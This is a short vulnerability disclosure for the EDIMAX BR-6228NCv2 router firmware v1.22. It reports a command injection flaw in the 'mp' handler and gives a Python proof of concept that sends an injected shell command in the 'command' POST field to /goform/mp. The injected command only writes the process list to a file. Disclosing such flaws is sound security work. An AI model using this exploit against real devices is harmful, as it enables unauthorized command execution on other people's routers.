Overview

• The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/BR6228NCv2_v1.22.zip

Affected version

BR-6228NCv2 (Version : v1.22)

Vulnerability details

The EDIMAX BR-6228NCv2 (Version : v1.22) firmware has a command injection vulnerability in the mp function. The Var variables receive the command parameters from a POST request. . However, since the user can control the input of these variables, the statement system() can cause a command injection.

POC

import requests

ip = "192.168.2.1"

payload = "$(ps>/1.txt)"
data = {"command": payload}
url = f'http://{ip}/goform/mp'

res = requests.post(url=url, data=data, verify=False)
print(res)